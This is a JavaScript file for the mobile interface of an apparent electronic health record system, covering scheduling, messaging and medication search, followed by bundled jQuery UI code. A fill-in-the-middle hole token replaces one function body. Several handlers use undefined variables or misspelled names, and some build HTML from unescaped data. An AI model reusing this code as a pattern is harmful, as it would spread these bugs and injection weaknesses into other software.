'schedule_pid'; } if (field == 'title') { field = 'schedule_title'; } $('#' + field).val(value); } } } }); var timestamp = $(this).attr('data-nosh-timestamp'); $("#event_id_span").text(form.event_id); $("#pid_span").text(form.pid); $("#timestamp_span").text(timestamp); if (form.visit_type){ loadappt(); $("#patient_search").val(form.title); $("#end").val(''); } else { loadevent(); } var repeat_select = $("#repeat").val(); if (repeat_select != ''){ $("#until_row").show(); } else { $("#until_row").hide(); $("#until").val(''); } $("#delete_form").show(); $("#schedule_form select").selectmenu('refresh'); $("#edit_content").show(); $("#content").hide(); $("#title").focus(); $.mobile.silentScroll(0); return false; } else { toastr.error('You cannot edit this entry!'); return false; } }); $(document).on('click', '.nosh_messaging_item', function(e) { var form = {}; var datastring = ''; var label = $(this).html(); label = label.replace('<h3>','<h3 class="card-primary-title">'); label = label.replace('<p>','<h5 class="card-subtitle">'); label = label.replace('</p>','</h5>'); var origin = $(this).attr('data-origin'); var id = $(this).attr('data-nosh-message-id'); $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { datastring += attr.name + '="' + attr.value + '" '; var field = attr.name.replace('data-nosh-',''); if (field == 'message-from-label') { form.displayname = attr.value; } if (field == 'date') { form.date = attr.value; } if (field == 'subject') { form.subject = attr.value; } if (field == 'body') { form.body = attr.value; } if (field == 'bodytext') { form.bodytext = attr.value; } } }); var text = '<br><strong>From:</strong> ' + form.displayname + '<br><br><strong>Date:</strong> ' + form.date + '<br><br><strong>Subject:</strong> ' + form.subject + '<br><br><strong>Message:</strong> ' + form.bodytext; var action = '<div class="card-action">'; action += '<div class="row between-xs">'; action += '<div class="col-xs-4">'; action += '<div class="box">'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab back_message" data-origin="' + origin + '" data-origin-id="' + id + '"><i class="zmdi zmdi-arrow-left"></i></a>'; action += '</div>' action += '</div>' if (origin == 'internal_inbox') { action += '<div class="col-xs-8 align-right">'; action += '<div class="box">'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab reply_message"' + datastring + '><i class="zmdi zmdi-mail-reply"></i></a>'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab reply_all_message"' + datastring + '><i class="zmdi zmdi-mail-reply-all"></i></a>'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab forward_message"' + datastring + '><i class="zmdi zmdi-forward"></i></a>'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab export_message"' + datastring + '><i class="zmdi zmdi-sign-in"></i></a>'; action += '</div>'; action += '</div>'; } action += '</div>'; action += '</div>'; var html = '<div class="nd2-card">'; html += '<div class="card-title">' + label + '</div>' + action; html += '<div class="card-supporting-text">' + text + '</div>' + action; html += '</div>'; $("#message_view1").html(html); //$("#message_view_rawtext").val(rawtext); //$("#message_view_message_id").val(id); //$("#message_view_from").val(row['message_from']); //$("#message_view_to").val(row['message_to']); //$("#message_view_cc").val(row['cc']); //$("#message_view_subject").val(row['subject']); //$("#message_view_body").val(row['body']); //$("#message_view_date").val(row['date']); //$("#message_view_pid").val(row['pid']); //$("#message_view_patient_name").val(row['patient_name']); //$("#message_view_t_messages_id").val(row['t_messages_id']); //$("#message_view_documents_id").val(row['documents_id']); //messages_tags(); //if (row['pid'] == '' || row['pid'] == "0") { //$("#export_message").hide(); //} else { //$("#export_message").show(); //} //$("#internal_messages_view_dialog").dialog('open'); //setTimeout(function() { //var a = $("#internal_messages_view_dialog" ).dialog("isOpen"); //if (a) { //var id = $("#message_view_message_id").val(); //var documents_id = $("#message_view_documents_id").val(); //if (documents_id == '') { //documents_id = '0'; //} //$.ajax({ //type: "POST", //url: "ajaxmessaging/read-message/" + id + "/" + documents_id, //success: function(data){ //$.jGrowl(data); //reload_grid("internal_inbox"); //} //}); //} //}, 3000); //form.event_id = $(this).attr('data-nosh-event-id'); //form.pid = $(this).attr('data-nosh-pid'); //form.start_date = moment(new Date($(this).attr('data-nosh-start-date'))).format('YYYY-MM-DD'); //form.start_time = $(this).attr('data-nosh-start-time'); //form.end = $(this).attr('data-nosh-end-time'); //form.visit_type = $(this).attr('data-nosh-visit-type'); //form.title = $(this).attr('data-nosh-title'); //form.repeat = $(this).attr('data-nosh-repeat'); //form.reason = $(this).attr('data-nosh-reason'); //form.until = $(this).attr('data-nosh-until'); //form.notes = $(this).attr('data-nosh-notes'); //form.status = $(this).attr('data-nosh-status'); //$.each(form, function(key, value){ //if (value != 'undefined') { //$('#'+key).val(value); //} //}); //var timestamp = $(this).attr('data-nosh-timestamp'); //$("#event_id_span").text(form.event_id); //$("#pid_span").text(form.pid); //$("#timestamp_span").text(timestamp); //if (form.visit_type){ //loadappt(); //$("#patient_search").val(form.title); //$("#end").val(''); //} else { //loadevent(); //} //var repeat_select = $("#repeat").val(); //if (repeat_select != ''){ //$("#until_row").show(); //} else { //$("#until_row").hide(); //$("#until").val(''); //} //$("#delete_form").show(); //$("#schedule_form select").selectmenu('refresh'); $("#view_content").show(); $("#content").hide(); $("#edit_content").hide(); $('html, body').animate({ scrollTop: $("#view_content").offset().top }); return false; }); $(document).on('click', '.mobile_form_action', function(e) { var form_id = $(this).attr('data-nosh-form'); var table = $(this).attr('data-nosh-table'); var row_id = $(this).attr('data-nosh-id'); var action = $(this).attr('data-nosh-action'); var refresh_url = $(this).attr('data-nosh-origin'); var row_index = $(this).attr('data-nosh-index'); var bValid = true; $("#"+form_id).find("[required]").each(function() { var input_id = $(this).attr('id'); var id1 = $("#" + input_id); var text = $("label[for='" + input_id + "']").html(); bValid = bValid && checkEmpty(id1, text); }); if (bValid) { var str = $("#"+form_id).serialize(); $.ajax({ type: "POST", url: "../ajaxcommon/mobile-form-action/" + table + '/' + action + '/' + row_id + '/' + row_index, data: str, dataType: 'json', success: function(data){ if (data.response == 'OK') { $('#'+form_id).clearForm(); $.mobile.loading("show"); toastr.success(data.message); $.ajax({ type: "POST", url: refresh_url, success: function(data1){ $("#content_inner").html(data1).trigger('create'); $("#edit_content").hide(); $("#navigation_header").hide(); $("#content").show(); $("#chart_header").show(); $.mobile.loading("hide"); } }); } else { // error handling } } }); } }); $(document).on('click', '.mobile_form_action2', function(e) { var form_id = $(this).attr('data-nosh-form'); var action = $(this).attr('data-nosh-action'); var refresh_url = $(this).attr('data-nosh-origin'); if (refresh_url == 'mobile_schedule') { var start_date = $("#start_date").val(); var end = $("#end").val(); var visit_type = $("#visit_type").val(); var pid = $("#pid").val(); if (pid == '') { var reason = $("#reason").val(); $("#title").val(reason); } if ($("#repeat").val() != '' && $("#event_id").val() != '' && $("#event_id").val().indexOf("R") === -1) { var event_id = $("#event_id").val(); $("#event_id").val("N" + event_id); } if ($("#repeat").val() == '' && $("#event_id").val() != '' && $("#event_id").val().indexOf("R") !== -1) { var event_id1 = $("#event_id").val(); $("#event_id").val("N" + event_id1); } var str = $("#"+form_id).serialize(); if (visit_type == '' || visit_type == null && end == '') { toastr.error("No visit type or end time selected!"); } else { $.mobile.loading("show"); $.ajax({ type: "POST", url: "ajaxschedule/edit-event", data: str, success: function(data){ open_schedule(start_date); $("#"+form_id).clearForm(); $("#edit_content").hide(); $("#content").show(); $.mobile.loading("hide"); } }); } } if (refresh_url == 'mobile_inbox') { if (action == 'save') { var bValid = true; $("#"+form_id).find("[required]").each(function() { var input_id = $(this).attr('id'); var id1 = $("#" + input_id); var text = $("label[for='" + input_id + "']").html(); bValid = bValid && checkEmpty(id1, text); }); if (bValid) { $.mobile.loading("show"); var str = $("#"+form_id).serialize(); $.ajax({ type: "POST", url: "ajaxmessaging/send-message", data: str, success: function(data){ toastr.success(data); $("#"+form_id).clearForm(); $("#edit_content").hide(); $("#content").show(); $.mobile.loading("hide"); } }); } } if (action == 'draft') { var str = $("#"+form_id).serialize(); $.ajax({ type: "POST", url: "ajaxmessaging/draft-message", data: str, success: function(data){ toastr.success(data); $("#"+form_id).clearForm(); $("#edit_content").hide(); $("#content").show(); $.mobile.loading("hide"); } }); } } // more stuff $("#edit_content").hide(); $("#content").show(); }); $(document).on("click", ".mobile_paste", function(e) { var value = $(this).attr('data-nosh-value'); var to = $(this).attr('data-nosh-paste-to'); $('#'+to).val(value); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".mobile_paste1", function(e) { var form = {}; form.rxl_medication = $(this).attr('data-nosh-med'); form.rxl_dosage = $(this).attr('data-nosh-value'); form.rxl_dosage_unit = $(this).attr('data-nosh-unit'); form.rxl_ndcid = $(this).attr('data-nosh-ndc'); $.each(form, function(key, value){ if (value != 'undefined') { $('#'+key).val(value); } }); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".mobile_paste2", function(e) { var value = $(this).attr('data-nosh-value'); var to = $("#form_item").val(); $('#'+to).val(value); if (to == 'patient_search') { var id = $(this).attr('data-nosh-id'); $("#schedule_pid").val(id); $("#schedule_title").val(value); } $("#right_panel").panel('close'); $("#"+to).focus(); }); $(document).on("click", ".mobile_paste3", function(e) { var form = {}; form.sup_supplement = $(this).attr('data-nosh-value'); form.sup_dosage = $(this).attr('data-nosh-dosage'); form.sup_dosage_unit = $(this).attr('data-nosh-dosage-unit'); form.supplement_id = $(this).attr('data-nosh-supplement-id'); $.each(form, function(key, value){ if (value != 'undefined') { $('#'+key).val(value); } }); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".mobile_paste4", function(e) { var value = $(this).attr('data-nosh-value'); var to = $(this).attr('data-nosh-paste-to'); var cvx = $(this).attr('data-nosh-cvx'); $('#'+to).val(value); $('#imm_cvxcode').val(cvx); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".return_button", function(e) { $("#right_panel").panel('close'); }); $(document).on("click", "input", function(e) { if ($(this).hasClass('texthelper')) { var id = $(this).attr('id'); $("#form_item").val(id); $("#navigation_header_fav").show(); } else { $("#navigation_header_fav").hide(); } }); $(document).on('keydown', '.texthelper', function(e){ var value = $(this).val(); var input = $(this).attr('id'); if (value && value.length > 1) { $("#form_item").val(input); var $ul = $("#search_results"); var html = ""; var parts = input.split('_'); if (parts[0] == 'rxl') { var url = "../ajaxsearch/rx-search/" + input + "/true"; } if (parts[0] == 'sup') { var url = "../ajaxsearch/sup-"+ parts[1]; } if (parts[0] == 'allergies') { var url = "../ajaxsearch/reaction/true"; } $.mobile.loading("show"); $.ajax({ url: url, dataType: "json", type: "POST", data: "term=" + value }) .then(function(response) { if (response.response == 'true') { $.each(response.message, function ( i, val ) { if (val.value != null) { html += '<li><a href=# class="ui-btn ui-btn-icon-left ui-icon-carat-l mobile_paste2" data-nosh-value="' + val.value +'">' + val.label + '</a></li>'; } }); $ul.html(html); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); $("#right_panel").panel('open'); } else { $.mobile.loading("hide"); } }); } }); $(document).on('keydown', '.texthelper1', function(e){ var value = $(this).val(); var input = $(this).attr('id'); if (value && value.length > 2) { $.mobile.loading("show"); $("#form_item").val(input); var $ul = $("#search_results"); var html = ""; $.ajax({ url: "ajaxsearch/search", dataType: "json", type: "POST", data: "term=" + value }) .then(function(response) { if (response.response == 'true') { $.each(response.message, function ( i, val ) { if (val.value != null) { html += '<li><a href=# class="ui-btn ui-btn-icon-left ui-icon-carat-l mobile_paste2" data-nosh-value="' + val.value +'" data-nosh-id="' + val.id + '">' + val.label + '</a></li>'; } }); $ul.html(html); $("#right_panel").width("500px"); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); $("#right_panel").panel('open'); } else { $.mobile.loading("hide"); } }); } }); $(document).on("click", "#nosh_fab", function(e) { $(".nosh_fab_child").toggle('fade'); return false; }); $(document).on("click", "#nosh_fab1", function(e) { $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); return false; }); $(document).on("change", "#provider_list2", function(e) { var id = $('#provider_list2').val(); if(id){ $.ajax({ type: "POST", url: "ajaxschedule/set-provider", data: "id=" + id, success: function(data){ $("#visit_type").removeOption(/./); $.ajax({ url: "ajaxsearch/visit-types/" + id, dataType: "json", type: "POST", async: false, success: function(data){ if (data.response == 'true') { $("#visit_type").addOption(data.message, false); } else { $("#visit_type").addOption({"":"No visit types available."},false); } } }); } }); } }); $(document).on("click", ".cd-read-more", function(e) { $.mobile.loading("show"); var type = $(this).attr('data-nosh-type'); var value = $(this).attr('data-nosh-value'); var status = $(this).attr('data-nosh-status'); var scroll = $(this).closest('.cd-timeline-block').offset().top; var acl = false; if (noshdata.group_id == '2' || noshdata.group_id == '3') { acl = true; } if (type == 'eid') { if (status == 'Yes') { if (acl) { $("#content_inner_main").hide(); $.ajax({ type: "GET", url: "../ajaxchart/modal-view-mobile/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('h4').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); } else { $("#content_inner_main").hide(); $.ajax({ type: "POST", url: "../ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $.ajax({ type: "GET", url: "../ajaxcommon/modal-view2-mobile/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('h4').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); } else { $toastr.error('You cannot view the encounter as your provider has not activated OpenNotes.'); $.mobile.loading("hide"); return false; } } }); } } else { toastr.error('Encounter is not signed. You cannot view it at this time.'); $.mobile.loading("hide"); return false; } } else if (type == 't_messages_id') { if (status == 'Yes') { if (acl) { $("#content_inner_main").hide(); $.ajax({ type: "GET", url: "../ajaxcommon/tmessages-view/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('strong').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); //$("#message_view").load('ajaxcommon/tmessages-view/' + value); //$("#t_messages_id").val(value); //t_messages_tags(); //$("#messages_view_dialog").dialog('open'); } else { $("#content_inner_main").hide(); $.ajax({ type: "POST", url: "../ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $.ajax({ type: "GET", url: "../ajaxcommon/tmessages-view/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('strong').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); //$("#t_messages_id").val(value); //$("#messages_view_dialog").dialog('open'); } else { toastr.error('You cannot view the message as your provider has not activated OpenNotes.'); $.mobile.loading("hide"); return false; } } }); } } else { toastr.error('Message is not signed. You cannot view it at this time.'); $.mobile.loading("hide"); return false; } } }); $(document).on("click", ".messaging_tab", function(e) { var tab = $(this).attr('data-tab'); open_messaging(tab); $("#edit_content").hide(); $("#content").show(); }); $(document).on("click", ".back_message", function(e) { var tab = $(this).attr('data-origin'); var id = $(this).attr('data-origin-id'); open_messaging(tab); $("#view_content").hide(); $("#edit_content").hide(); $("#content").show(); var scroll = parseInt($('.nosh_messaging_item[data-nosh-message-id="' + id + '"]').offset().top); $.mobile.silentScroll(scroll-70); }); $(document).on("click", ".reply_message", function(e) { var form = {}; $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace(/-/g, '_'); form[field] = attr.value; if (attr.value != 'undefined') { if (attr.value != 'null') { if (field != 'timestamp') { var value = attr.value; if (field == 'date') { value = moment(new Date(value)).format('YYYY-MM-DD'); } $('input[name="' + field + '"]').val(value); } } } } }); $.ajax({ type: "POST", url: "ajaxmessaging/get-displayname", data: "id=" + form['message_from'], success: function(data){ $('select[name="messages_to[]"]').val(data); $('select[name="messages_to[]"]').selectmenu('refresh'); var subject = 'Re: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('textarea[name="body"]').val(newbody).caret(0); $('textarea[name="body"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); } }); }); $(document).on("click", ".reply_all_message", function(e) { var form = {}; $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace(/-/g, '_'); form[field] = attr.value; if (attr.value != 'undefined') { if (attr.value != 'null') { if (field != 'timestamp') { var value = attr.value; if (field == 'date') { value = moment(new Date(value)).format('YYYY-MM-DD'); } $('input[name="' + field + '"]').val(value); } } } } }); if (form['cc'] == ''){ $.ajax({ type: "POST", url: "ajaxmessaging/get-displayname", data: "id=" + form['message_from'], success: function(data){ $('select[name="messages_to[]"]').val(data); $('select[name="messages_to[]"]').selectmenu('refresh'); var subject = 'Re: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('textarea[name="body"]').val(newbody).caret(0); $('textarea[name="body"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); } }); } else { var to1 = to + ';' + cc; $.ajax({ type: "POST", url: ".ajaxmessaging/get-displayname1", data: "id=" + form['message_from'] + ';' + form['cc'], success: function(data){ var a_array = String(data).split(";"); $('select[name="messages_to[]"]').val(a_array); $('select[name="messages_to[]"]').selectmenu('refresh'); //var a_length = a_array.length; //for (var i = 0; i < a_length; i++) { //$('select[name="messages_to[]"]').selectOptions(a_array[i]); //} var subject = 'Re: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('textarea[name="body"]').val(newbody).caret(0); $('textarea[name="body"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); } }); } }); $(document).on("click", ".forward_message", function(e) { var form = {}; $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace(/-/g, '_'); form[field] = attr.value; if (attr.value != 'undefined') { if (attr.value != 'null') { if (field != 'timestamp') { var value = attr.value; if (field == 'date') { value = moment(new Date(value)).format('YYYY-MM-DD'); } $('input[name="' + field + '"]').val(value); } } } } }); var rawtext = 'From: ' + form['message_from_label'] + '\nDate: ' + form['date'] + '\nSubject: ' + form['subject'] + '\n\nMessage: ' + form['body']; var subject = 'Fwd: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('input[name="body"]').val(newbody).caret(0); $('input[name="messages_to"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); }); $(document).on("click", ".template_click", function(e) { $.mobile.loading("show"); //var id = $(this).prev().attr('id'); //console.log(id); var id = 'hpi'; $.mobile.loading("show"); $.ajax({ url: "ajaxsearch/textdump-group/" + id, type: "POST" }) .then(function(response) { $("#textdump_group_html").html(''); $("#textdump_group_html").append(response); $("#textdump_group_html").children().css({"padding":"6px"}); $("#textdump_group_html").children().not(':last-child').css({"border-width":"2px","border-bottom":"2px black solid"}); $(".edittextgroup").html('<i class="zmdi zmdi-edit"></i>').addClass('ui-btn ui-btn-inline'); $(".deletetextgroup").html('<i class="zmdi zmdi-delete"></i>').addClass('ui-btn ui-btn-inline'); $(".normaltextgroup").each(function(){ $item = $(this); $nextdiv = $(this).parent().next(); $($item).next('label').html('ALL NORMAL').css('color','blue').andSelf().wrapAll('<fieldset data-role="controlgroup" data-type="horizontal" data-mini="true"></fieldset>').parent().prependTo($nextdiv); }); $(".restricttextgroup").html('<i class="zmdi zmdi-close"></i>').addClass('ui-btn ui-btn-inline'); $("#textdump_group_target").val(id); $('#textdump_group_html_div').css('overflow-y', 'scroll'); $.mobile.loading("hide"); $("#textdump_group_html").trigger('create'); $('#textdump_group_html_div').popup('open'); }); }); $('#textdump_group_html_div').on({ popupbeforeposition: function() { var maxHeight = $(window).height() - 30; $('#textdump_group_html_div').css('max-height', maxHeight + 'px'); } }); $(document).on('click', '.textdump_group_item', function(){ $.mobile.loading("show"); var id = $("#textdump_group_target").val(); var group = $(this).text(); $("#textdump_group_item").val(group); var id1 = $(this).attr('id'); $("#textdump_group_id").val(id1); $.ajax({ type: "POST", url: "ajaxsearch/textdump/" + id, data: 'group='+group }) .then(function(response) { $("#textdump_html").html(''); $("#textdump_html").append(response); $("#textdump_html").children().css({"padding":"6px"}); $("#textdump_html").children().not(':last-child').css({"border-width":"2px","border-bottom":"2px black solid"}); $(".edittexttemplate").html('<i class="zmdi zmdi-edit"></i>').addClass('ui-btn ui-btn-inline'); $(".deletetexttemplate").html('<i class="zmdi zmdi-delete"></i>').addClass('ui-btn ui-btn-inline'); $(".normaltexttemplate").each(function(){ $item = $(this); $nextdiv = $(this).parent(); $($item).next('label').html('DEFAULT').css('color','blue').andSelf().wrapAll('<fieldset data-role="controlgroup" data-type="horizontal" data-mini="true"></fieldset>').parent().prependTo($nextdiv); }); // $(".normaltexttemplate").button({text: false, icons: {primary: "ui-icon-check"}}); // $('.textdump_item_text').editable('destroy'); // $('.textdump_item_text').editable({ // toggle:'manual', // ajaxOptions: { // headers: {"cache-control":"no-cache"}, // beforeSend: function(request) { // return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); // }, // error: function(xhr) { // if (xhr.status == "404" ) { // alert("Route not found!"); // //window.location.replace(noshdata.error); // } else { // if(xhr.responseText){ // var response1 = $.parseJSON(xhr.responseText); // var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; // alert(error); // } // } // } // } // }); $("#textdump_target").val(id); $('#textdump_html_div').css('overflow-y', 'scroll'); $.mobile.loading("hide"); $("#textdump_html").trigger('create'); $('#textdump_group_html_div').popup('close'); $('#textdump_html_div').popup('open'); }); }); $('#textdump_html_div').on({ popupbeforeposition: function() { var maxHeight = $(window).height() - 30; $('#textdump_html_div').css('max-height', maxHeight + 'px'); } }); /*! jQuery UI - v1.11.1 - 2014-09-10 * http://jqueryui.com * Includes: core.js, datepicker.js * Copyright 2014 jQuery Foundation and other contributors; Licensed MIT */ (function( factory ) { if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. define([ "jquery" ], factory ); } else { // Browser globals factory( jQuery ); } }(function( $ ) { /*! * jQuery UI Core 1.11.1 * http://jqueryui.com * * Copyright 2014 jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/category/ui-core/ */ // $.ui might exist from components with no dependencies, e.g., $.ui.position $.ui = $.ui || {}; $.extend( $.ui, { version: "1.11.1", keyCode: { BACKSPACE: 8, COMMA: 188, DELETE: 46, DOWN: 40, END: 35, ENTER: 13, ESCAPE: 27, HOME: 36, LEFT: 37, PAGE_DOWN: 34, PAGE_UP: 33, PERIOD: 190, RIGHT: 39, SPACE: 32, TAB: 9, UP: 38 } }); // plugins $.fn.extend({ scrollParent: function( includeHidden ) { var position = this.css( "position" ), excludeStaticParent = position === "absolute", overflowRegex = includeHidden ? /(auto|scroll|hidden)/ : /(auto|scroll)/, scrollParent = this.parents().filter( function() { var parent = $( this ); if ( excludeStaticParent && parent.css( "position" ) === "static" ) { return false; } return overflowRegex.test( parent.css( "overflow" ) + parent.css( "overflow-y" ) + parent.css( "overflow-x" ) ); }).eq( 0 ); return position === "fixed" || !scrollParent.length ? $( this[ 0 ].ownerDocument || document ) : scrollParent; }, uniqueId: (function() { var uuid = 0; return function() { return this.each(function() { if ( !this.id ) { this.id = "ui-id-" + ( ++uuid ); } }); }; })(), removeUniqueId: function() { return this.each(function() { if ( /^ui-id-\d+$/.test( this.id ) ) { $( this ).removeAttr( "id" ); } }); } }); // selectors function focusable( element, isTabIndexNotNaN ) { var map, mapName, img, nodeName = element.nodeName.toLowerCase(); if ( "area" === nodeName ) { map = element.parentNode; mapName = map.name; if ( !element.href || !mapName || map.nodeName.toLowerCase() !== "map" ) { return false; } img = $( "img[usemap='#" + mapName + "']" )[ 0 ]; return !!img && visible( img ); } return ( /input|select|textarea|button|object/.test( nodeName ) ? !element.disabled : "a" === nodeName ? element.href || isTabIndexNotNaN : isTabIndexNotNaN) && // the element and all of its ancestors must be visible visible( element ); } function visible( element ) { return $.expr.filters.visible( element ) && !$( element ).parents().addBack().filter(function() { return $.css( this, "visibility" ) === "hidden"; }).length; } $.extend( $.expr[ ":" ], { data: $.expr.createPseudo ? $.expr.createPseudo(function( dataName ) { return function( elem ) { return !!$.data( elem, dataName ); }; }) : // support: jQuery <1.8 function( elem, i, match ) { return !!$.data( elem, match[ 3 ] ); }, focusable: function( element ) { return focusable( element, !isNaN( $.attr( element, "tabindex" ) ) ); }, tabbable: function( element ) {<|fim▁hole|> } }); // support: jQuery <1.8 if ( !$( "<a>" ).outerWidth( 1 ).jquery ) { $.each( [ "Width", "Height" ], function( i, name ) { var side = name === "Width" ? [ "Left", "Right" ] : [ "Top", "Bottom" ], type = name.toLowerCase(), orig = { innerWidth: $.fn.innerWidth, innerHeight: $.fn.innerHeight, outerWidth: $.fn.outerWidth, outerHeight: $.fn.outerHeight }; function reduce( elem, size, border, margin ) { $.each( side, function() { size -= parseFloat( $.css( elem, "padding" + this ) ) || 0; if ( border ) { size -= parseFloat( $.css( elem, "border" + this + "Width" ) ) || 0; } if ( margin ) { size -= parseFloat( $.css( elem, "margin" + this ) ) || 0; } }); return size; } $.fn[ "inner" + name ] = function( size ) { if ( size === undefined ) { return orig[ "inner" + name ].call( this ); } return this.each(function() { $( this ).css( type, reduce( this, size ) + "px" ); }); }; $.fn[ "outer" + name] = function( size, margin ) { if ( typeof size !== "number" ) { return orig[ "outer" + name ].call( this, size ); } return this.each(function() { $( this).css( type, reduce( this, size, true, margin ) + "px" ); }); }; }); } // support: jQuery <1.8 if ( !$.fn.addBack ) { $.fn.addBack = function( selector ) { return this.add( selector == null ? this.prevObject : this.prevObject.filter( selector ) ); }; } // support: jQuery 1.6.1, 1.6.2 (http://bugs.jquery.com/ticket/9413) if ( $( "<a>" ).data( "a-b", "a" ).removeData( "a-b" ).data( "a-b" ) ) { $.fn.removeData = (function( removeData ) { return function( key ) { if ( arguments.length ) { return removeData.call( this, $.camelCase( key ) ); } else { return removeData.call( this ); } }; })( $.fn.removeData ); } // deprecated $.ui.ie = !!/msie [\w.]+/.exec( navigator.userAgent.toLowerCase() ); $.fn.extend({ focus: (function( orig ) { return function( delay, fn ) { return typeof delay === "number" ? this.each(function() { var elem = this; setTimeout(function() { $( elem ).focus(); if ( fn ) { fn.call( elem ); } }, delay ); }) : orig.apply( this, arguments ); }; })( $.fn.focus ), disableSelection: (function() { var eventType = "onselectstart" in document.createElement( "div" ) ? "selectstart" : "mousedown"; return function() { return this.bind( eventType + ".ui-disableSelection", function( event ) { event.preventDefault(); }); }; })(), enableSelection: function() { return this.unbind( ".ui-disableSelection" ); }, zIndex: function( zIndex ) { if ( zIndex !== undefined ) { return this.css( "zIndex", zIndex ); } if ( this.length ) { var elem = $( this[ 0 ] ), position, value; while ( elem.length && elem[ 0 ] !== document ) { // Ignore z-index if position is set to a value where z-index is ignored by the browser // This makes behavior of this function consistent across browsers // WebKit always returns auto if the element is positioned position = elem.css( "position" ); if ( position === "absolute" || position === "relative" || position === "fixed" ) { // IE returns 0 when zIndex is not specified // other browsers return a string // we ignore the case of nested elements with an explicit value of 0 // <div style="z-index: -10;"><div style="z-index: 0;"></div></div> value = parseInt( elem.css( "zIndex" ), 10 ); if ( !isNaN( value ) && value !== 0 ) { return value; } } elem = elem.parent(); } } return 0; } }); // $.ui.plugin is deprecated. Use $.widget() extensions instead. $.ui.plugin = { add: function( module, option, set ) { var i, proto = $.ui[ module ].prototype; for ( i in set ) { proto.plugins[ i ] = proto.plugins[ i ] || []; proto.plugins[ i ].push( [ option, set[ i ] ] ); } }, call: function( instance, name, args, allowDisconnected ) { var i, set = instance.plugins[ name ]; if ( !set ) { return; } if ( !allowDisconnected && ( !instance.element[ 0 ].parentNode || instance.element[ 0 ].parentNode.nodeType === 11 ) ) { return; } for ( i = 0; i < set.length; i++ ) { if ( instance.options[ set[ i ][ 0 ] ] ) { set[ i ][ 1 ].apply( instance.element, args ); } } } }; /*! * jQuery UI Datepicker 1.11.1 * http://jqueryui.com * * Copyright 2014 jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/datepicker/ */ $.extend($.ui, { datepicker: { version: "1.11.1" } }); var datepicker_instActive; function datepicker_getZindex( elem ) { var position, value; while ( elem.length && elem[ 0 ] !== document ) { // Ignore z-index if position is set to a value where z-index is ignored by the browser // This makes behavior of this function consistent across browsers // WebKit always returns auto if the element is positioned position = elem.css( "position" ); if ( position === "absolute" || position === "relative" || position === "fixed" ) { // IE returns 0 when zIndex is not specified // other browsers return a string // we ignore the case of nested elements with an explicit value of 0 // <div style="z-index: -10;"><div style="z-index: 0;"></div></div> value = parseInt( elem.css( "zIndex" ), 10 ); if ( !isNaN( value ) && value !== 0 ) { return value; } } elem = elem.parent(); } return 0; } /* Date picker manager. Use the singleton instance of this class, $.datepicker, to interact with the date picker. 